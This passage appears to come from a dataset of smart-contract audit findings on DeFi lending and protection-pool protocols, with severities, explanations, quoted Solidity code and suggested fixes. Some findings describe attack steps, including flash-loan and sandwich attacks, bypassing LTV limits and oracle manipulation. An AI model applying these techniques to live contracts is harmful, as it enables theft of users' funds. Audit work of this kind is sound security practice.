_poolParameters.minRequiredCapital\\n )\\n ) {\\n // rest of code\\n } else {\\n /// This means that the risk factor cannot be calculated because of either\\n /// min capital not met or leverage ratio out of range.\\n /// Hence, the premium is the minimum premium\\n _isMinPremium = true;\\n }\\n```\\n\\nIn RiskFactor.canCalculateRiskFactor, we see there are three conditions when this is so:\\n```\\n function canCalculateRiskFactor(\\n uint256 _totalCapital,\\n uint256 _leverageRatio,\\n uint256 _leverageRatioFloor,\\n uint256 _leverageRatioCeiling,\\n uint256 _minRequiredCapital\\n ) external pure returns (bool _canCalculate) {\\n if (\\n _totalCapital < _minRequiredCapital ||\\n _leverageRatio < _leverageRatioFloor ||\\n _leverageRatio > _leverageRatioCeiling\\n ) {\\n _canCalculate = false;\\n } else {\\n _canCalculate = true;\\n }\\n }\\n}\\n```\\n\\nIf the leverage ratio is above the ceiling, then protection should be very cheap, and it is correct to use the minimum premium. If the leverage ratio is above the floor, then protection cannot be purchased.\\nHowever, we see that the minimum premium is also used if _totalCapital is below _minRequiredCapital. 
In this case, protection should be very expensive, but it will instead be very cheap.","Issue If unlocked capital in pool falls below minRequiredCapital, then protection can be bought for minimum premium\\nProhibit protection purchases when capital falls below the minimum required capital",Buyers can get very cheap protection at a time when it should be expensive.,"```\\n if (\\n RiskFactorCalculator.canCalculateRiskFactor(\\n _totalCapital,\\n _leverageRatio,\\n _poolParameters.leverageRatioFloor,\\n _poolParameters.leverageRatioCeiling,\\n _poolParameters.minRequiredCapital\\n )\\n ) {\\n // rest of code\\n } else {\\n /// This means that the risk factor cannot be calculated because of either\\n /// min capital not met or leverage ratio out of range.\\n /// Hence, the premium is the minimum premium\\n _isMinPremium = true;\\n }\\n```\\n" +secondary markets are problematic with how `lockCapital` works,medium,"Seeing that a pool is about to lock, an attacker can use a flash loan from a secondary market like uniswap to claim the share of a potential unlock of capital later.\\nThe timestamp a pool switches to `Late` can be predicted and an attacker can use this to call `assessState` which is callable by anyone. This will trigger the pool to move from Active/LateWithinGracePeriod to `Late` calling `lockCapital` on the ProtectionPool:\\n```\\nFile: ProtectionPool.sol\\n\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n```\\n\\nThis records who is holding sTokens at this point in time. 
If the borrower makes a payment and the pool turns back to Active, later the locked funds will be available to claim for the sToken holders at that snapshot:\\n```\\nFile: DefaultStateManager.sol\\n\\n /// The claimable amount for the given seller is proportional to the seller's share of the total supply at the snapshot\\n /// claimable amount = (seller's snapshot balance / total supply at snapshot) * locked capital amount\\n _claimableUnlockedCapital =\\n (_poolSToken.balanceOfAt(_seller, _snapshotId) *\\n lockedCapital.amount) /\\n _poolSToken.totalSupplyAt(_snapshotId);\\n```\\n\\nFrom docs:\\nIf sellers wish to redeem their capital and interest before the lockup period, they might be able to find a buyer of their sToken in a secondary market like Uniswap. Traders in the exchanges can long/short sTokens based on their opinion about the risk exposure associated with sTokens. Since an sToken is a fungible ERC20 token, it is fairly easy to bootstrap the secondary markets for protection sellers.\\nIf there is a uniswap (or similar) pool for this sToken, an attacker could potentially, using a flash loan, trigger the switch to `Late` and since they will be the ones holding the sTokens at the point of locking they will be the ones that can claim the funds at a potential unlock.","I recommend you make `assessState` only callable by a trusted user. This would remove the attack vector, since you must hold the tokens over a transaction. It would still be possible to use the withdraw bug, but if that is fixed this would remove the possibility to ""flash-lock"".","An attacker can, using a flash loan from a secondary market like uniswap, steal a LPs possible share of unlocked tokens. 
Only paying taking the risk of the flash loan fee.",```\\nFile: ProtectionPool.sol\\n\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n```\\n +Sandwich attack to accruePremiumAndExpireProtections(),high,"Let's show how a malicious user, Bob, can launch a sandwich attack to `accruePremiumAndExpireProtections()` and profit.\\nSuppose there are 1,000,000 underlying tokens for the `ProtectionPool`, and `totalSupply = 1,000,000`, therefore the exchange rate is 1/1 share. Suppose Bob has 100,000 shares.\\nSuppose `accruePremiumAndExpireProtections()` is going to be called and add 100,000 to `totalSTokenUnderlying` at L346.\\nBob front-runs `accruePremiumAndExpireProtections()` and calls `deposit()` to deposit 100,000 underlying tokens into the contract. The check for `ProtectionPoolPhase` will pass for an open phase. As a result, there are 1,100,000 underlying tokens, and 1,100,000 shares, the exchange rate is still 1/1 share. 
Bob now has 200,000 shares.\\n```\\n function deposit(uint256 _underlyingAmount, address _receiver)\\n external\\n override\\n whenNotPaused\\n nonReentrant\\n {\\n _deposit(_underlyingAmount, _receiver);\\n }\\n\\n function _deposit(uint256 _underlyingAmount, address _receiver) internal {\\n /// Verify that the pool is not in OpenToBuyers phase\\n if (poolInfo.currentPhase == ProtectionPoolPhase.OpenToBuyers) {\\n revert ProtectionPoolInOpenToBuyersPhase();\\n }\\n\\n uint256 _sTokenShares = convertToSToken(_underlyingAmount);\\n totalSTokenUnderlying += _underlyingAmount;\\n _safeMint(_receiver, _sTokenShares);\\n poolInfo.underlyingToken.safeTransferFrom(\\n msg.sender,\\n address(this),\\n _underlyingAmount\\n );\\n\\n /// Verify leverage ratio only when total capital/sTokenUnderlying is higher than minimum capital requirement\\n if (_hasMinRequiredCapital()) {\\n /// calculate pool's current leverage ratio considering the new deposit\\n uint256 _leverageRatio = calculateLeverageRatio();\\n\\n if (_leverageRatio > poolInfo.params.leverageRatioCeiling) {\\n revert ProtectionPoolLeverageRatioTooHigh(_leverageRatio);\\n }\\n }\\n\\n emit ProtectionSold(_receiver, _underlyingAmount);\\n }\\n```\\n\\nNow accruePremiumAndExpireProtections()gets called and 100,000 is added to `totalSTokenUnderlying` at L346. As a result, we have 1,200,000 underlying tokens with 1,100,000 shares. The exchange rate becomes 12/11 share.\\nBob calls the `withdraw()` function (assume he made a request two cycles back, he could do that since he had 100,000 underlying tokens in the pool) to withdraw 100,000 shares and he will get `100,000*12/11 = 109,090` underlying tokens. 
So he has a profit of 9,090 underlying tokens by the sandwich attack.","Create a new contract as a temporary place to store the accrued premium, and then deliver it to the `ProtectionPool` over a period of time (delivery period) with some `premiumPerSecond` to lower the incentive of a quick profit by sandwich attack.\\nRestrict the maximum deposit amount for each cycle.\\nRestrict the maximum withdraw amount for each cycle.",A malicious user can launch a sandwich attack to accruePremiumAndExpireProtections()and profit.,"```\\n function deposit(uint256 _underlyingAmount, address _receiver)\\n external\\n override\\n whenNotPaused\\n nonReentrant\\n {\\n _deposit(_underlyingAmount, _receiver);\\n }\\n\\n function _deposit(uint256 _underlyingAmount, address _receiver) internal {\\n /// Verify that the pool is not in OpenToBuyers phase\\n if (poolInfo.currentPhase == ProtectionPoolPhase.OpenToBuyers) {\\n revert ProtectionPoolInOpenToBuyersPhase();\\n }\\n\\n uint256 _sTokenShares = convertToSToken(_underlyingAmount);\\n totalSTokenUnderlying += _underlyingAmount;\\n _safeMint(_receiver, _sTokenShares);\\n poolInfo.underlyingToken.safeTransferFrom(\\n msg.sender,\\n address(this),\\n _underlyingAmount\\n );\\n\\n /// Verify leverage ratio only when total capital/sTokenUnderlying is higher than minimum capital requirement\\n if (_hasMinRequiredCapital()) {\\n /// calculate pool's current leverage ratio considering the new deposit\\n uint256 _leverageRatio = calculateLeverageRatio();\\n\\n if (_leverageRatio > poolInfo.params.leverageRatioCeiling) {\\n revert ProtectionPoolLeverageRatioTooHigh(_leverageRatio);\\n }\\n }\\n\\n emit ProtectionSold(_receiver, _underlyingAmount);\\n }\\n```\\n" +Users who deposit extra funds into their Ichi farming positions will lose all their ICHI rewards,high,"When a user deposits extra funds into their Ichi farming position using `openPositionFarm()`, the old farming position will be closed down and a new one will be opened. 
Part of this process is that their ICHI rewards will be sent to the `IchiVaultSpell.sol` contract, but they will not be distributed. They will sit in the contract until the next user (or MEV bot) calls `closePositionFarm()`, at which point they will be stolen by that user.\\nWhen Ichi farming positions are opened via the `IchiVaultSpell.sol` contract, `openPositionFarm()` is called. It goes through the usual deposit function, but rather than staking the LP tokens directly, it calls `wIchiFarm.mint()`. This function deposits the token into the `ichiFarm`, encodes the deposit as an ERC1155, and sends that token back to the Spell:\\n```\\nfunction mint(uint256 pid, uint256 amount)\\n external\\n nonReentrant\\n returns (uint256)\\n{\\n address lpToken = ichiFarm.lpToken(pid);\\n IERC20Upgradeable(lpToken).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n if (\\n IERC20Upgradeable(lpToken).allowance(\\n address(this),\\n address(ichiFarm)\\n ) != type(uint256).max\\n ) {\\n // We only need to do this once per pool, as LP token's allowance won't decrease if it's -1.\\n IERC20Upgradeable(lpToken).safeApprove(\\n address(ichiFarm),\\n type(uint256).max\\n );\\n }\\n ichiFarm.deposit(pid, amount, address(this));\\n // @ok if accIchiPerShare is always changing, so how does this work?\\n // it's basically just saving the accIchiPerShare at staking time, so when you unstake, it can calculate the difference\\n // really fucking smart actually\\n (uint256 ichiPerShare, , ) = ichiFarm.poolInfo(pid);\\n uint256 id = encodeId(pid, ichiPerShare);\\n _mint(msg.sender, id, amount, """");\\n return id;\\n}\\n```\\n\\nThe resulting ERC1155 is posted as collateral in the Blueberry Bank.\\nIf the user decides to add more funds to this position, they simply call `openPositionFarm()` again. The function has logic to check if there is already existing collateral of this LP token in the Blueberry Bank. 
If there is, it removes the collateral and calls `wIchiFarm.burn()` (which harvests the Ichi rewards and withdraws the LP tokens) before repeating the deposit process.\\n```\\nfunction burn(uint256 id, uint256 amount)\\n external\\n nonReentrant\\n returns (uint256)\\n{\\n if (amount == type(uint256).max) {\\n amount = balanceOf(msg.sender, id);\\n }\\n (uint256 pid, uint256 stIchiPerShare) = decodeId(id);\\n _burn(msg.sender, id, amount);\\n\\n uint256 ichiRewards = ichiFarm.pendingIchi(pid, address(this));\\n ichiFarm.harvest(pid, address(this));\\n ichiFarm.withdraw(pid, amount, address(this));\\n\\n // Convert Legacy ICHI to ICHI v2\\n if (ichiRewards > 0) {\\n ICHIv1.safeApprove(address(ICHI), ichiRewards);\\n ICHI.convertToV2(ichiRewards);\\n }\\n\\n // Transfer LP Tokens\\n address lpToken = ichiFarm.lpToken(pid);\\n IERC20Upgradeable(lpToken).safeTransfer(msg.sender, amount);\\n\\n // Transfer Reward Tokens\\n (uint256 enIchiPerShare, , ) = ichiFarm.poolInfo(pid);\\n uint256 stIchi = (stIchiPerShare * amount).divCeil(1e18);\\n uint256 enIchi = (enIchiPerShare * amount) / 1e18;\\n\\n if (enIchi > stIchi) {\\n ICHI.safeTransfer(msg.sender, enIchi - stIchi);\\n }\\n return pid;\\n}\\n```\\n\\nHowever, this deposit process has no logic for distributing the ICHI rewards. Therefore, these rewards will remain sitting in the `IchiVaultSpell.sol` contract and will not reach the user.\\nFor an example of how this is handled properly, we can look at the opposite function, `closePositionFarm()`. In this case, the same `wIchiFarm.burn()` function is called. 
But in this case, it's followed up with an explicit call to withdraw the ICHI from the contract to the user.\\n```\\ndoRefund(ICHI);\\n```\\n\\nThis `doRefund()` function refunds the contract's full balance of ICHI to the `msg.sender`, so the result is that the next user to call `closePositionFarm()` will steal the ICHI tokens from the original user who added to their farming position.","Issue Users who deposit extra funds into their Ichi farming positions will lose all their ICHI rewards\\nIn the `openPositionFarm()` function, in the section that deals with withdrawing existing collateral, add a line that claims the ICHI rewards for the calling user.\\n```\\nif (collSize > 0) {\\n (uint256 decodedPid, ) = wIchiFarm.decodeId(collId);\\n if (farmingPid != decodedPid) revert INCORRECT_PID(farmingPid);\\n if (posCollToken != address(wIchiFarm))\\n revert INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wIchiFarm.burn(collId, collSize);\\n// Add the line below\\n doRefund(ICHI);\\n}\\n```\\n",Users who farm their Ichi LP tokens for ICHI rewards can permanently lose their rewards.,"```\\nfunction mint(uint256 pid, uint256 amount)\\n external\\n nonReentrant\\n returns (uint256)\\n{\\n address lpToken = ichiFarm.lpToken(pid);\\n IERC20Upgradeable(lpToken).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n if (\\n IERC20Upgradeable(lpToken).allowance(\\n address(this),\\n address(ichiFarm)\\n ) != type(uint256).max\\n ) {\\n // We only need to do this once per pool, as LP token's allowance won't decrease if it's -1.\\n IERC20Upgradeable(lpToken).safeApprove(\\n address(ichiFarm),\\n type(uint256).max\\n );\\n }\\n ichiFarm.deposit(pid, amount, address(this));\\n // @ok if accIchiPerShare is always changing, so how does this work?\\n // it's basically just saving the accIchiPerShare at staking time, so when you unstake, it can calculate the difference\\n // really fucking smart actually\\n (uint256 ichiPerShare, , ) = 
ichiFarm.poolInfo(pid);\\n uint256 id = encodeId(pid, ichiPerShare);\\n _mint(msg.sender, id, amount, """");\\n return id;\\n}\\n```\\n" +LP tokens are not sent back to withdrawing user,high,"When users withdraw their assets from `IchiVaultSpell.sol`, the function unwinds their position and sends them back their assets, but it never sends them back the amount they requested to withdraw, leaving the tokens stuck in the Spell contract.\\nWhen a user withdraws from `IchiVaultSpell.sol`, they either call `closePosition()` or `closePositionFarm()`, both of which make an internal call to `withdrawInternal()`.\\nThe following arguments are passed to the function:\\nstrategyId: an index into the `strategies` array, which specifies the Ichi vault in question\\ncollToken: the underlying token, which is withdrawn from Compound\\namountShareWithdraw: the number of underlying tokens to withdraw from Compound\\nborrowToken: the token that was borrowed from Compound to create the position, one of the underlying tokens of the vault\\namountRepay: the amount of the borrow token to repay to Compound\\namountLpWithdraw: the amount of the LP token to withdraw, rather than trade back into borrow tokens\\nIn order to accomplish these goals, the contract does the following...\\nRemoves the LP tokens from the ERC1155 holding them for collateral.\\n```\\ndoTakeCollateral(strategies[strategyId].vault, lpTakeAmt);\\n```\\n\\nCalculates the number of LP tokens to withdraw from the vault.\\n```\\nuint256 amtLPToRemove = vault.balanceOf(address(this)) - amountLpWithdraw;\\nvault.withdraw(amtLPToRemove, address(this));\\n```\\n\\nConverts the non-borrowed token that was withdrawn in the borrowed token (not copying the code in, as it's not relevant to this issue).\\nWithdraw the underlying token from Compound.\\n```\\ndoWithdraw(collToken, amountShareWithdraw);\\n```\\n\\nPay back the borrowed token to Compound.\\n```\\ndoRepay(borrowToken, amountRepay);\\n```\\n\\nValidate that this situation 
does not put us above the maxLTV for our loans.\\n```\\n_validateMaxLTV(strategyId);\\n```\\n\\nSends the remaining borrow token that weren't paid back and withdrawn underlying tokens to the user.\\n```\\ndoRefund(borrowToken);\\ndoRefund(collToken);\\n```\\n\\nCrucially, the step of sending the remaining LP tokens to the user is skipped, even though the function specifically does the calculations to ensure that `amountLpWithdraw` is held back from being taken out of the vault.",Add an additional line to the `withdrawInternal()` function to refund all LP tokens as well:\\n```\\n doRefund(borrowToken);\\n doRefund(collToken);\\n// Add the line below\\n doRefund(address(vault));\\n```\\n,Users who close their positions and choose to keep LP tokens (rather than unwinding the position for the constituent tokens) will have their LP tokens stuck permanently in the IchiVaultSpell contract.,"```\\ndoTakeCollateral(strategies[strategyId].vault, lpTakeAmt);\\n```\\n" +Users can get around MaxLTV because of lack of strategyId validation,high,"When a user withdraws some of their underlying token, there is a check to ensure they still meet the Max LTV requirements. 
However, they are able to arbitrarily enter any `strategyId` that they would like for this check, which could allow them to exceed the LTV for their real strategy while passing the approval.\\nWhen a user calls `IchiVaultSpell.sol#reducePosition()`, it removes some of their underlying token from the vault, increasing the LTV of any loans they have taken.\\nAs a result, the `_validateMaxLTV(strategyId)` function is called to ensure they remain compliant with their strategy's specified LTV:\\n```\\nfunction _validateMaxLTV(uint256 strategyId) internal view {\\n uint256 debtValue = bank.getDebtValue(bank.POSITION_ID());\\n (, address collToken, uint256 collAmount, , , , , ) = bank\\n .getCurrentPositionInfo();\\n uint256 collPrice = bank.oracle().getPrice(collToken);\\n uint256 collValue = (collPrice * collAmount) /\\n 10**IERC20Metadata(collToken).decimals();\\n\\n if (\\n debtValue >\\n (collValue * maxLTV[strategyId][collToken]) / DENOMINATOR\\n ) revert EXCEED_MAX_LTV();\\n}\\n```\\n\\nTo summarize, this check:\\nPulls the position's total debt value\\nPulls the position's total value of underlying tokens\\nPulls the specified maxLTV for this strategyId and underlying token combination\\nEnsures that `underlyingTokenValue * maxLTV > debtValue`\\nBut there is no check to ensure that this `strategyId` value corresponds to the strategy the user is actually invested in, as we can see the `reducePosition()` function:\\n```\\nfunction reducePosition(\\n uint256 strategyId,\\n address collToken,\\n uint256 collAmount\\n) external {\\n doWithdraw(collToken, collAmount);\\n doRefund(collToken);\\n _validateMaxLTV(strategyId);\\n}\\n```\\n\\nHere is a quick proof of concept to explain the risk:\\nLet's say a user deposits 1000 DAI as their underlying collateral.\\nThey are using a risky strategy (let's call it strategy 911) which requires a maxLTV of 2X (ie maxLTV[911][DAI] = 2e5)\\nThere is another safer strategy (let's call it strategy 411) which has a maxLTV of 5X (ie 
maxLTV[411][DAI] = 4e5)\\nThe user takes the max loan from the risky strategy, borrowing $2000 USD of value.\\nThey are not allowed to take any more loans from that strategy, or remove any of their collateral.\\nThen, they call `reducePosition()`, withdrawing 1600 DAI and entering `411` as the strategyId.\\nThe `_validateMaxLTV` check will happen on `strategyId = 411`, and will pass, but the result will be that the user now has only 400 DAI of underlying collateral protecting $2000 USD worth of the risky strategy, violating the LTV.","Issue Users can get around MaxLTV because of lack of strategyId validation\\nSince the collateral a position holds will always be the vault token of the strategy they have used, you can validate the `strategyId` against the user's collateral, as follows:\\n```\\naddress positionCollToken = bank.positions(bank.POSITION_ID()).collToken;\\naddress positionCollId = bank.positions(bank.POSITION_ID()).collId;\\naddress unwrappedCollToken = IERC20Wrapper(positionCollToken).getUnderlyingToken(positionCollId);\\nrequire(strategies[strategyId].vault == unwrappedCollToken, ""wrong strategy"");\\n```\\n","Users can get around the specific LTVs and create significantly higher leverage bets than the protocol has allowed. 
This could cause the protocol to get underwater, as the high leverage combined with risky assets could lead to dramatic price swings without adequate time for the liquidation mechanism to successfully protect solvency.","```\\nfunction _validateMaxLTV(uint256 strategyId) internal view {\\n uint256 debtValue = bank.getDebtValue(bank.POSITION_ID());\\n (, address collToken, uint256 collAmount, , , , , ) = bank\\n .getCurrentPositionInfo();\\n uint256 collPrice = bank.oracle().getPrice(collToken);\\n uint256 collValue = (collPrice * collAmount) /\\n 10**IERC20Metadata(collToken).decimals();\\n\\n if (\\n debtValue >\\n (collValue * maxLTV[strategyId][collToken]) / DENOMINATOR\\n ) revert EXCEED_MAX_LTV();\\n}\\n```\\n" +Users can be liquidated prematurely because calculation understates value of underlying position,high,"When the value of the underlying asset is calculated in `getPositionRisk()`, it uses the `underlyingAmount`, which is the amount of tokens initially deposited, without any adjustment for the interest earned. This can result in users being liquidated early, because the system undervalues their assets.\\nA position is considered liquidatable if it meets the following criteria:\\n```\\n((borrowsValue - collateralValue) / underlyingValue) >= underlyingLiqThreshold\\n```\\n\\nThe value of the underlying tokens is a major factor in this calculation. However, the calculation of the underlying value is performed with the following function call:\\n```\\nuint256 cv = oracle.getUnderlyingValue(\\n pos.underlyingToken,\\n pos.underlyingAmount\\n);\\n```\\n\\nIf we trace it back, we can see that `pos.underlyingAmount` is set when `lend()` is called (ie when underlying assets are deposited). This is the only place in the code where this value is moved upward, and it is only increased by the amount deposited. 
It is never moved up to account for the interest payments made on the deposit, which can materially change the value.","Value of the underlying assets should be derived from the vault shares and value, rather than being stored directly.",Users can be liquidated prematurely because the value of their underlying assets are calculated incorrectly.,```\\n((borrowsValue - collateralValue) / underlyingValue) >= underlyingLiqThreshold\\n```\\n +Interest component of underlying amount is not withdrawable using the `withdrawLend` function. Such amount is permanently locked in the BlueBerryBank contract,high,"Soft vault shares are issued against interest bearing tokens issued by `Compound` protocol in exchange for underlying deposits. However, `withdrawLend` function caps the withdrawable amount to initial underlying deposited by user (pos.underlyingAmount). Capping underlying amount to initial underlying deposited would mean that a user can burn all his vault shares in `withdrawLend` function and only receive original underlying deposited.\\nInterest accrued component received from Soft vault (that rightfully belongs to the user) is no longer retrievable because the underlying vault shares are already burnt. Loss to the users is permanent as such interest amount sits permanently locked in Blueberry bank.\\n`withdrawLend` function in `BlueBerryBank` allows users to withdraw underlying amount from `Hard` or `Soft` vaults. `Soft` vault shares are backed by interest bearing `cTokens` issued by Compound Protocol\\nUser can request underlying by specifying `shareAmount`. When user tries to send the maximum `shareAmount` to withdraw all the lent amount, notice that the amount withdrawable is limited to the `pos.underlyingAmount` (original deposit made by the user).\\nWhile this is the case, notice also that the full `shareAmount` is deducted from `underlyingVaultShare`. 
User cannot recover remaining funds because in the next call, user doesn't have any vault shares against his address. Interest accrued component on the underlying that was returned by `SoftVault` to `BlueberryBank` never makes it back to the original lender.\\n```\\n wAmount = wAmount > pos.underlyingAmount\\n ? pos.underlyingAmount\\n : wAmount;\\n\\n pos.underlyingVaultShare -= shareAmount;\\n pos.underlyingAmount -= wAmount;\\n bank.totalLend -= wAmount;\\n```\\n","Introduced a new variable to adjust positions & removed cap on withdraw amount.\\nHighlighted changes I recommend to withdrawLend with //******//.\\n```\\nfunction withdrawLend(address token, uint256 shareAmount)\\n external\\n override\\n inExec\\n poke(token)\\n {\\n Position storage pos = positions[POSITION_ID];\\n Bank storage bank = banks[token];\\n if (token != pos.underlyingToken) revert INVALID_UTOKEN(token);\\n \\n //*********-audit cap shareAmount to maximum value, pos.underlyingVaultShare*******\\n if (shareAmount > pos.underlyingVaultShare) {\\n shareAmount = pos.underlyingVaultShare;\\n }\\n\\n // if (shareAmount == type(uint256).max) {\\n // shareAmount = pos.underlyingVaultShare;\\n // } \\n\\n uint256 wAmount;\\n uint256 amountToOffset; //*********- audit added this to adjust position********\\n if (address(ISoftVault(bank.softVault).uToken()) == token) {\\n ISoftVault(bank.softVault).approve(\\n bank.softVault,\\n type(uint256).max\\n );\\n wAmount = ISoftVault(bank.softVault).withdraw(shareAmount);\\n } else {\\n wAmount = IHardVault(bank.hardVault).withdraw(token, shareAmount);\\n }\\n\\n //*********- audit calculate amountToOffset********\\n //*********-audit not capping wAmount anymore*******\\n amountToOffset = wAmount > pos.underlyingAmount\\n ? 
pos.underlyingAmount\\n : wAmount;\\n\\n pos.underlyingVaultShare -= shareAmount;\\n //*********-audit subtract amountToOffset instead of wAmount*******\\n pos.underlyingAmount -= amountToOffset;\\n bank.totalLend -= amountToOffset;\\n\\n wAmount = doCutWithdrawFee(token, wAmount);\\n\\n IERC20Upgradeable(token).safeTransfer(msg.sender, wAmount);\\n }\\n```\\n","Every time, user withdraws underlying from a Soft vault, interest component gets trapped in BlueBerry contract. Here is a scenario.\\nAlice deposits 1000 USDC into `SoftVault` using the `lend` function of BlueberryBank at T=0\\nUSDC soft vault mints 1000 shares to Blueberry bank\\nUSDC soft vault deposits 1000 USDC into Compound & receives 1000 cUSDC\\nAlice at T=60 days requests withdrawal against 1000 Soft vault shares\\nSoft Vault burns 1000 soft vault shares and requests withdrawal from Compound against 1000 cTokens\\nSoft vault receives 1050 USDC (50 USDC interest) and sends this to BlueberryBank\\nBlueberry Bank caps the withdrawal amount to 1000 (original deposit)\\nBlueberry Bank deducts 0.5% withdrawal fees and deposits 995 USDC back to user\\nIn the whole process, Alice has lost access to 50 USDC.",```\\n wAmount = wAmount > pos.underlyingAmount\\n ? pos.underlyingAmount\\n : wAmount;\\n\\n pos.underlyingVaultShare -= shareAmount;\\n pos.underlyingAmount -= wAmount;\\n bank.totalLend -= wAmount;\\n```\\n +BlueBerryBank#withdrawLend will cause underlying token accounting error if soft/hard vault has withdraw fee,high,"Soft/hard vaults can have a withdraw fee. This takes a certain percentage from the user when they withdraw. The way that the token accounting works in BlueBerryBank#withdrawLend, it will only remove the amount returned by the hard/soft vault from pos.underlying amount. 
If there is a withdraw fee, underlying amount will not be decrease properly and the user will be left with phantom collateral that they can still use.\\n```\\n // Cut withdraw fee if it is in withdrawVaultFee Window (2 months)\\n if (\\n block.timestamp <\\n config.withdrawVaultFeeWindowStartTime() +\\n config.withdrawVaultFeeWindow()\\n ) {\\n uint256 fee = (withdrawAmount * config.withdrawVaultFee()) /\\n DENOMINATOR;\\n uToken.safeTransfer(config.treasury(), fee);\\n withdrawAmount -= fee;\\n }\\n```\\n\\nBoth SoftVault and HardVault implement a withdraw fee. Here we see that withdrawAmount (the return value) is decreased by the fee amount.\\n```\\n uint256 wAmount;\\n if (address(ISoftVault(bank.softVault).uToken()) == token) {\\n ISoftVault(bank.softVault).approve(\\n bank.softVault,\\n type(uint256).max\\n );\\n wAmount = ISoftVault(bank.softVault).withdraw(shareAmount);\\n } else {\\n wAmount = IHardVault(bank.hardVault).withdraw(token, shareAmount);\\n }\\n\\n wAmount = wAmount > pos.underlyingAmount\\n ? pos.underlyingAmount\\n : wAmount;\\n\\n pos.underlyingVaultShare -= shareAmount;\\n pos.underlyingAmount -= wAmount;\\n bank.totalLend -= wAmount;\\n```\\n\\nThe return value is stored as `wAmount` which is then subtracted from `pos.underlyingAmount` the issue is that the withdraw fee has now caused a token accounting error for `pos`. We see that the fee paid to the hard/soft vault is NOT properly removed from `pos.underlyingAmount`. This leaves the user with phantom underlying which doesn't actually exist but that the user can use to take out loans.\\nExmaple: For simplicity let's say that 1 share = 1 underlying and the soft/hard vault has a fee of 5%. Imagine a user deposits 100 underlying to receive 100 shares. Now the user withdraws their 100 shares while the hard/soft vault has a withdraw. This burns 100 shares and softVault/hardVault.withdraw returns 95 (100 - 5). 
During the token accounting pos.underlyingVaultShares are decreased to 0 but pos.underlyingAmount is still equal to 5 (100 - 95).\\n```\\n uint256 cv = oracle.getUnderlyingValue(\\n pos.underlyingToken,\\n pos.underlyingAmount\\n );\\n```\\n\\nThis accounting error is highly problematic because collateralValue uses pos.underlyingAmount to determine the value of collateral for liquidation purposes. This allows the user to take on more debt than they should.","`HardVault/SoftVault#withdraw` should also return the fee paid to the vault, so that it can be accounted for.",User is left with collateral that isn't real but that can be used to take out a loan,"```\\n // Cut withdraw fee if it is in withdrawVaultFee Window (2 months)\\n if (\\n block.timestamp <\\n config.withdrawVaultFeeWindowStartTime() +\\n config.withdrawVaultFeeWindow()\\n ) {\\n uint256 fee = (withdrawAmount * config.withdrawVaultFee()) /\\n DENOMINATOR;\\n uToken.safeTransfer(config.treasury(), fee);\\n withdrawAmount -= fee;\\n }\\n```\\n" +IchiLpOracle is extemely easy to manipulate due to how IchiVault calculates underlying token balances,high,"`IchiVault#getTotalAmounts` uses the `UniV3Pool.slot0` to determine the number of tokens it has in it's position. `slot0` is the most recent data point and is therefore extremely easy to manipulate. Given that the protocol specializes in leverage, the effects of this manipulation would compound to make malicious uses even easier.\\nICHIVault.sol\\n```\\nfunction _amountsForLiquidity(\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity\\n) internal view returns (uint256, uint256) {\\n (uint160 sqrtRatioX96, , , , , , ) = IUniswapV3Pool(pool).slot0();\\n return\\n UV3Math.getAmountsForLiquidity(\\n sqrtRatioX96,\\n UV3Math.getSqrtRatioAtTick(tickLower),\\n UV3Math.getSqrtRatioAtTick(tickUpper),\\n liquidity\\n );\\n}\\n```\\n\\n`IchiVault#getTotalAmounts` uses the `UniV3Pool.slot0` to determine the number of tokens it has in it's position. 
slot0 is the most recent data point and can easily be manipulated.\\n`IchiLPOracle` directly uses the token values returned by `vault#getTotalAmounts`. This allows a malicious user to manipulate the valuation of the LP. An example of this kind of manipulation would be to use large buys/sells to alter the composition of the LP to make it worth less or more.","Token balances should be calculated inside the oracle instead of getting them from the `IchiVault`. To determine the liquidity, use a TWAP instead of `slot0`.",Ichi LP value can be manipulated to cause loss of funds for the protocol and other users,"```\\nfunction _amountsForLiquidity(\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity\\n) internal view returns (uint256, uint256) {\\n (uint160 sqrtRatioX96, , , , , , ) = IUniswapV3Pool(pool).slot0();\\n return\\n UV3Math.getAmountsForLiquidity(\\n sqrtRatioX96,\\n UV3Math.getSqrtRatioAtTick(tickLower),\\n UV3Math.getSqrtRatioAtTick(tickUpper),\\n liquidity\\n );\\n}\\n```\\n" +IchiLpOracle returns inflated price due to invalid calculation,medium,"`IchiLpOracle` returns inflated price due to invalid calculation\\nIf you run the tests, then you can see that IchiLpOracle returns inflated price for the ICHI_USDC vault\\n```\\nSTATICCALL IchiLpOracle.getPrice(token=0xFCFE742e19790Dd67a627875ef8b45F17DB1DaC6) => (1101189125194558706411110851447)\\n```\\n\\nAs the documentation says, the token price should be in USD with 18 decimals of precision. The price returned here is `1101189125194_558706411110851447` This is 1.1 trillion USD when considering the 18 decimals.\\nThe test uses real values except for mocking ichi and usdc price, which are returned by the mock with correct decimals (1e18 and 1e6)",Issue IchiLpOracle returns inflated price due to invalid calculation\\nFix the LP token price calculation. 
The problem is that you multiply totalReserve with extra 1e18 (return (totalReserve * 1e18) / totalSupply;).,`IchiLpOracle` price is used in `_validateMaxLTV` (collToken is the vault). Therefore the collateral value is inflated and users can open bigger positions than their collateral would normally allow.,```\\nSTATICCALL IchiLpOracle.getPrice(token=0xFCFE742e19790Dd67a627875ef8b45F17DB1DaC6) => (1101189125194558706411110851447)\\n```\\n +"totalLend isn't updated on liquidation, leading to permanently inflated value",medium,"`bank.totalLend` tracks the total amount that has been lent of a given token, but it does not account for tokens that are withdrawn when a position is liquidated. As a result, the value will become overstated, leading to inaccurate data on the pool.\\nWhen a user lends a token to the Compound fork, the bank for that token increases its `totalLend` parameter:\\n```\\nbank.totalLend += amount;\\n```\\n\\nSimilarly, this value is decreased when the amount is withdrawn.\\nIn the event that a position is liquidated, the `underlyingAmount` and `underlyingVaultShare` for the user are decreased based on the amount that will be transferred to the liquidator.\\n```\\nuint256 liqSize = (pos.collateralSize * share) / oldShare;\\nuint256 uTokenSize = (pos.underlyingAmount * share) / oldShare;\\nuint256 uVaultShare = (pos.underlyingVaultShare 